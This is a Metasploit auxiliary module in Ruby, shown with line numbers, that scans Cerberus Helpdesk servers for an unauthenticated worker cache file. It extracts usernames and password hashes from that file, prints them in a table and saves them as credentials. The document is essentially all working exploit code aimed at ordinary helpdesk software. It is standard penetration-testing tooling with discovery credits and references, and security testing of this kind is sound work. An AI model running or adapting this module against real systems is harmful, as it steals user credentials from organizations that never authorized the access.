Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::HttpClient
8
  include Msf::Auxiliary::Scanner
9
  include Msf::Auxiliary::Report
10

11
  def initialize
12
    super(
13
      'Name'         => 'Cerberus Helpdesk User Hash Disclosure',
14
      'Description'  => %q{
15
        This module extracts usernames and password hashes from the Cerberus Helpdesk
16
        through an unauthenticated access to a workers file.
17
        Verified on Version 4.2.3 Stable (Build 925) and 5.4.4
18
        },
19
      'References'   =>
20
        [
21
          [ 'EDB', '39526' ]
22
        ],
23
      'Author'       =>
24
        [
25
          'asdizzle_', # discovery
26
          'h00die',    # module
27
        ],
28
      'License'      => MSF_LICENSE,
29
      'DisclosureDate' => 'Mar 7 2016'
30
    )
31

32
    register_options(
33
      [
34
        OptString.new('TARGETURI', [false, 'URL of the Cerberus Helpdesk root', '/'])
35
      ])
36
  end
37

38
  def run_host(rhost)
39
    begin
40
      ['devblocks', 'zend'].each do |site|
41
        url = normalize_uri(datastore['TARGETURI'], 'storage', 'tmp', "#{site}_cache---ch_workers")
42
        vprint_status("Attempting to load data from #{url}")
43
        res = send_request_cgi({'uri' => url})
44
        if !res
45
          print_error("#{peer} Unable to connect to #{url}")
46
          next
47
        end
48

49
        if !res.body.include?('pass')
50
          print_error("Invalid response received for #{peer} for #{url}")
51
          next
52
        end
53

54
        cred_table = Rex::Text::Table.new 'Header'  => 'Cerberus Helpdesk User Credentials',
55
                                          'Indent'  => 1,
56
                                          'Columns' => ['Username', 'Password Hash']
57

58
        # the returned object looks json-ish, but it isn't. Unsure of format, so we'll do some ugly manual parsing.
59
        # this will be a rough equivalent to sed -e 's/s:5/\n/g' | grep email | cut -d '"' -f4,8 | sed 's/"/:/g'
60
        result = res.body.split('s:5')
61
        result.each do |cred|
62
          if cred.include?('email')
63
            cred = cred.split(':')
64
            username = cred[3].tr('";', '') # remove extra characters
65
            username = username[0...-1] # also remove trailing s
66
            password_hash = cred[7].tr('";', '') # remove extra characters
67
            print_good("Found: #{username}:#{password_hash}")
68
            store_valid_credential(
69
              user:         username,
70
              private:      password_hash,
71
              private_type: :nonreplayable_hash
72
            )
73
            cred_table << [username, password_hash]
74
          end
75
        end
76
        print_line
77
        print_line cred_table.to_s
78
        break
79
      end
80

81
    rescue ::Rex::ConnectionError
82
      print_error("#{peer} Unable to connect to site")
83
      return
84
    end
85
  end
86
end
87

88